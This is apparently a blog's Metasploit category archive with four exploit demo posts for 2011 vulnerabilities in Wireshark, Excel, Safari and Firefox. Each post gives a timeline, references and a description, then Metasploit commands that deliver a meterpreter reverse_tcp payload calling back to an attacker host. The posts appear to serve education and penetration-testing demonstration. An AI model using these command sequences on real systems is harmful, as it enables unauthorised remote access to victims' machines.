Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-3360 Wireshark console.lua pre-loading Vulnerability Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered and reported to vendor by Haifei Li of MMPC the 2011-07-18
Coordinated release of the vulnerability the 2011-11-15
Metasploit PoC provided the 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there’s a ‘console.lua’ file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Exploits, Metasploit, ,

Timeline :

Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI the 2010-10-18
Coordinated release of the vulnerability the 2011-04-12
Metasploit PoC provided the 2011-11-05

PoC provided by :

Aniway
abysssec
sinn3r
juan vazquez

Reference(s) :

CVE-2011-0105
MS11-021
ZDI-11-121

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo

CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability the 2011-10-12
Metasploit PoC provided the 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy the 2011-06-13
Public release of the vulnerability the 2011-06-21
Metasploit PoC provided the 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo